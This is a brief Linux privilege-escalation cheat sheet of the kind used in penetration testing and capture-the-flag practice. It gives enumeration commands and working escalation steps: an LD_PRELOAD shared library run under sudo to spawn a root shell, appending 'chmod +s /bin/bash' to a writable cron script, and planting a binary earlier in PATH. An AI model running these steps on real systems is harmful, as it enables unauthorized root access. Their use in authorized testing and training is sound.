Linux Privilege Escalation
Common misconfigurations and weaknesses to check when escalating privileges on Linux.
§
table of contents
Sudo
sudo -l
Check GTFOBins for any listed binary.
If env_keep+=LD_PRELOAD is set:
# compile a shared lib that spawns a shell
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <allowed_binary>
SUID / SGID
find / -user root -perm -4000 -ls 2>/dev/null # SUID
find / -group root -perm -2000 -ls 2>/dev/null # SGID
Check any non-standard binary on GTFOBins.
Misconfiguration
# World-writable directories
find / -type d -perm -2 -ls 2>/dev/null
# World-writable files owned by root
find / -user root -perm -2 ! -type l -ls 2>/dev/null
Cron Jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
If a cron runs a script you can write to, replace its content:
echo 'chmod +s /bin/bash' >> /path/to/script.sh
If the cron uses a relative PATH and a directory is writable, drop a malicious binary earlier in $PATH.
Capabilities
getcap -r / 2>/dev/null
Dangerous capabilities: cap_setuid, cap_net_raw, cap_dac_override.
Check GTFOBins for exploitation.
Kernel Exploits
uname -r
searchsploit linux kernel $(uname -r)
LinPEAS / WinPEAS
Automated enumeration scripts to surface privesc vectors quickly.